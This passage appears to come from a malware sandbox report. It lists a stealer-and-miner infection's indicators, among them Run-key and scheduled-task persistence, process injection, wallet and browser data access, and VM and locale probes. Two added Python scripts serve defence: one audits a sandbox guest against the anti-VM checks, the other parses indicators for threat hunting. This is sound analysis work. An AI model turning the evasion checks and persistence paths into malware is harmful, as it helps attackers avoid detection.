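The VirtualBox ACPI, BIOS-version, Geo\Nation and Software\Wine probes above (and the NLS\Language key opened in the System Location Discovery rows further down) are a handful of registry reads, so a sandbox operator can check what a guest exposes to them before detonating. The Python below is an added example, not the samples' code or the report's: `CHECKS` lists the keys exactly as the indicator rows give them, `evaluate` applies a plausible bail-out decision to collected values, and `collect` reads the keys with `winreg` on a live Windows host. The hypervisor substrings, the `Default` value under NLS\Language, and the GEOID/LCID sets (RU, UA, BY, KZ) are assumptions: the page shows only that the values are read, not what the samples compare them against. The two snapshots are constructed.

```python
"""Re-run the environment probes the report attributes to the dropped binaries."""
import sys

# (hive, key, value name or None for a bare key-open), copied from the report's indicator rows.
# The "Default" value under NLS\Language is an assumption; the page only shows the key being opened.
CHECKS = {
    "vbox_acpi":    ("HKLM", r"HARDWARE\ACPI\DSDT\VBOX__", None),
    "system_bios":  ("HKLM", r"HARDWARE\DESCRIPTION\System", "SystemBiosVersion"),
    "video_bios":   ("HKLM", r"HARDWARE\DESCRIPTION\System", "VideoBiosVersion"),
    "wine":         ("HKCU", r"Software\Wine", None),
    "geo_nation":   ("HKCU", r"Control Panel\International\Geo", "Nation"),
    "nls_language": ("HKLM", r"SYSTEM\ControlSet001\Control\NLS\Language", "Default"),
}

# Assumed substrings that give away a hypervisor in the BIOS strings.
VM_MARKERS = ("VBOX", "VIRTUALBOX", "VMWARE", "QEMU", "BOCHS", "XEN", "HYPER-V", "VRTUAL", "PARALLELS")
# Assumed locale sets: what the samples compare Nation / NLS\Language against is not on the page.
AVOIDED_GEOIDS = {203: "RU", 241: "UA", 29: "BY", 190: "KZ"}
AVOIDED_LCIDS = {"0419": "ru-RU", "0422": "uk-UA", "0423": "be-BY", "043f": "kk-KZ"}


def evaluate(observed: dict) -> dict:
    """observed maps check name -> value (True for a bare key that exists, None if absent).
    Returns check name -> reason for every probe that would make a sample bail out."""
    findings = {}
    if observed.get("vbox_acpi") is not None:
        findings["vbox_acpi"] = "ACPI DSDT table named VBOX__ exists (VirtualBox)"
    for name in ("system_bios", "video_bios"):
        value = observed.get(name)                       # REG_MULTI_SZ arrives as a list
        text = " ".join(value) if isinstance(value, (list, tuple)) else str(value or "")
        hits = [m for m in VM_MARKERS if m in text.upper()]
        if hits:
            findings[name] = f"{text.strip()!r} mentions {', '.join(hits)}"
    if observed.get("wine") is not None:
        findings["wine"] = "HKCU\\Software\\Wine exists (running under Wine)"
    geo = observed.get("geo_nation")
    if geo is not None and int(geo) in AVOIDED_GEOIDS:
        findings["geo_nation"] = f"GEOID {geo} = {AVOIDED_GEOIDS[int(geo)]}"
    lcid = observed.get("nls_language")
    if lcid is not None and str(lcid).lower() in AVOIDED_LCIDS:
        findings["nls_language"] = f"LCID {lcid} = {AVOIDED_LCIDS[str(lcid).lower()]}"
    return findings


def collect() -> dict:
    """Read the same keys on a live Windows host (the sandbox guest you want to harden)."""
    if sys.platform != "win32":
        raise RuntimeError("registry collection only works on Windows")
    import winreg
    hives = {"HKLM": winreg.HKEY_LOCAL_MACHINE, "HKCU": winreg.HKEY_CURRENT_USER}
    observed = {}
    for name, (hive, key, value) in CHECKS.items():
        try:
            with winreg.OpenKey(hives[hive], key) as handle:
                observed[name] = winreg.QueryValueEx(handle, value)[0] if value else True
        except OSError:                                  # key or value absent
            observed[name] = None
    return observed


# Constructed snapshots: a stock VirtualBox guest and a guest with the strings patched.
STOCK_VBOX_GUEST = {"vbox_acpi": True, "system_bios": ["VBOX   - 1"],
                    "video_bios": ["Oracle VM VirtualBox VBE Adapter"], "wine": None,
                    "geo_nation": "244", "nls_language": "0409"}
HARDENED_GUEST = {"vbox_acpi": None, "system_bios": ["LENOVO - 1480"],
                  "video_bios": ["Intel Video BIOS"], "wine": None,
                  "geo_nation": "244", "nls_language": "0409"}

if __name__ == "__main__":
    snapshot = collect() if sys.platform == "win32" else STOCK_VBOX_GUEST
    for check, reason in evaluate(snapshot).items():
        print(f"{check}: {reason}")
```

A guest that yields no findings from `evaluate(collect())` still has to survive the other checks listed in this report (VideoBiosVersion is queried by far more of the dropped binaries than SystemBiosVersion, so patch both), and the locale probes mean a guest set to a CIS locale will simply never show the stealer and miner stages.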
Loads dropped DLL
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b1f64d5430.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107440101\\b1f64d5430.exe" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10107450121\\am_no.cmd" | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\2CsAdXyX\\Anubis.exe\"" | C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe | N/A |
Checks installed software on the system
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Windows\explorer.exe | N/A |
| File opened (read-only) | \??\F: | C:\Windows\explorer.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | pastebin.com | N/A | N/A |
| N/A | pastebin.com | N/A | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3384 set thread context of 2356 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\notepad.exe |
| PID 3932 set thread context of 4584 | N/A | C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe | C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe |
| PID 5068 set thread context of 3940 | N/A | C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe | C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe |
| PID 5892 set thread context of 524 | N/A | C:\Users\Admin\AppData\Local\Temp\10107680101\cd3b193722.exe | C:\Users\Admin\AppData\Local\Temp\10107680101\cd3b193722.exe |
| PID 5496 set thread context of 5536 | N/A | C:\Users\Admin\AppData\Local\Temp\10107670101\96dce6476e.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
| PID 5432 set thread context of 5976 | N/A | C:\Users\Admin\AppData\Local\Temp\10107690101\8f50b7e3b0.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\Tasks\Gxtuum.job | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| File created | C:\Windows\Tasks\Test Task17.job | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe | N/A |
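The persistence rows (Run keys, Startup folder, Active Setup, `C:\Windows\Tasks\*.job`) and the SetThreadContext rows above are what a responder hunts for first, but the report prints them with kernel-style `\REGISTRY\...` paths and C-escaped values. The Python below is an added example, not the report's own tooling: it normalises those rows into hunting artifacts and classifies each thread-context event by whether the injector targets a copy of itself, a Windows binary, or is itself a Windows binary. The sample rows are a constructed excerpt copied from the tables above; the artifact kind labels are names chosen for this example, not the sandbox's.

```python
"""Normalise the report's persistence and thread-context rows into hunting artifacts."""
import re
from dataclasses import dataclass
from typing import Optional

# Constructed excerpt: rows copied from the page's Run-key, startup-file, Tasks, Active Setup
# and SetThreadContext tables, in the report's own four-column layout.
SAMPLE_ROWS = r"""
| Set value (str) | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\google_updates = "C:\\Users\\Admin\\AppData\\Roaming\\google_updates.exe" | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Anubis = "\"C:\\Users\\Admin\\AppData\\Roaming\\Local\\Caches\\2CsAdXyX\\Anubis.exe\"" | C:\Users\Admin\AppData\Local\Temp\10107610101\ce4pMzk.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\google_updates.lnk | C:\Users\Admin\AppData\Local\Temp\10107420101\cnntXtU.exe | N/A |
| File created | C:\Windows\Tasks\rapes.job | C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A |
| PID 3384 set thread context of 2356 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\notepad.exe |
| PID 5068 set thread context of 3940 | N/A | C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe | C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe |
| PID 5496 set thread context of 5536 | N/A | C:\Users\Admin\AppData\Local\Temp\10107670101\96dce6476e.exe | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe |
"""

SID_RE = re.compile(r"^\\REGISTRY\\USER\\(S-1-5-[\d-]+)\\", re.IGNORECASE)
CTX_RE = re.compile(r"^PID (\d+) set thread context of (\d+)$")


@dataclass
class Artifact:
    kind: str
    location: str            # registry value path, file path, or "injector -> target"
    command: Optional[str]   # decoded command for Run keys, else None
    actor: str               # process that created it


def normalize_key(path: str) -> str:
    """Map kernel-style \\REGISTRY\\... paths to the HKLM\\ or HKU\\<SID>\\ form that tools accept."""
    prefix = "\\REGISTRY\\MACHINE\\"
    if path.upper().startswith(prefix):
        return "HKLM\\" + path[len(prefix):]
    m = SID_RE.match(path)
    if m:
        return "HKU\\" + m.group(1) + "\\" + path[m.end():]
    return path


def decode_reg_string(raw: str) -> str:
    # Undo the report's C-style quoting: outer quotes, then \" and \\ escapes, then any
    # quotes the malware itself wrapped around the path (as in the Anubis entry).
    s = raw.strip()
    if len(s) >= 2 and s[0] == s[-1] == '"':
        s = s[1:-1]
    return s.replace('\\"', '"').replace("\\\\", "\\").strip('"')


def classify(cells) -> Optional[Artifact]:
    desc, indicator, proc, target = cells
    m = CTX_RE.match(desc)
    if m:
        src, dst = proc.lower(), target.lower()
        if src == dst:
            kind = "self-injection"                 # payload unpacked into a suspended copy of itself
        elif src.startswith("c:\\windows\\") and dst.startswith("c:\\windows\\"):
            kind = "injection-from-system-process"  # the injector is already a hijacked Windows binary
        elif dst.startswith("c:\\windows\\"):
            kind = "hollowing-of-windows-binary"    # unsigned dropper hides inside a Windows host image
        else:
            kind = "injection"
        return Artifact(kind, f"{proc} (PID {m.group(1)}) -> {target} (PID {m.group(2)})", None, proc)
    key = normalize_key(indicator)
    if desc.startswith("Set value") and "\\CurrentVersion\\Run\\" in key:
        value_path, _, raw = key.partition(" = ")
        return Artifact("run-key", value_path, decode_reg_string(raw), proc)
    if desc == "Key created" and key.endswith("\\Active Setup\\Installed Components"):
        return Artifact("active-setup", key, None, proc)
    if desc.startswith("File") and "\\Start Menu\\Programs\\Startup\\" in indicator:
        return Artifact("startup-folder", indicator, None, proc)
    if desc.startswith("File") and indicator.lower().startswith("c:\\windows\\tasks\\") \
            and indicator.lower().endswith(".job"):
        return Artifact("task-job", indicator, None, proc)
    return None


def extract_artifacts(text: str):
    out = []
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("|"):
            continue
        cells = [c.strip() for c in line.strip("|").split("|")]
        if len(cells) != 4 or cells[0] == "Description":   # skip malformed rows and the header
            continue
        art = classify(cells)
        if art:
            out.append(art)
    return out


if __name__ == "__main__":
    for a in extract_artifacts(SAMPLE_ROWS):
        cmd = f"  => {a.command}" if a.command else ""
        print(f"{a.kind:30} {a.location}{cmd}  [by {a.actor}]")
```

Explorer.EXE writing a thread context into notepad.exe, together with explorer.exe creating the Active Setup key and opening the D: and F: volumes in the rows above, is consistent with one of the payloads already running inside the shell; treat explorer-originated events in this report as attacker activity rather than user activity when building the timeline.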
Browser Information Discovery
Enumerates physical storage devices
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107570101\Ps7WqSx.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107630101\v6Oqdnc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107670101\96dce6476e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107690101\8f50b7e3b0.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\10000770100\vertualiziren.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107650101\zY9sqWs.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107680101\cd3b193722.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\f3a7cbb7d3e5485e279fd7e314f8466c3b624f349243b7441310cada56b2f61e.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107580101\FvbuInU.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107620101\MCxU5Fj.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107310101\nhDLtPT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107680101\cd3b193722.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\TempDZN9N3X1URJGLADPWM2EIKIOWBQVZRLP.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107700101\6e33c98ed3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107440101\b1f64d5430.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\ProgramData\dxukjxx\gmgc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107660101\f6270156d1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107550101\nhDLtPT.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\timeout.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\10107600101\mAtJWNv.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\a58456755d\Gxtuum.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | C:\Windows\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | C:\Windows\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | C:\Windows\explorer.exe | N/A |
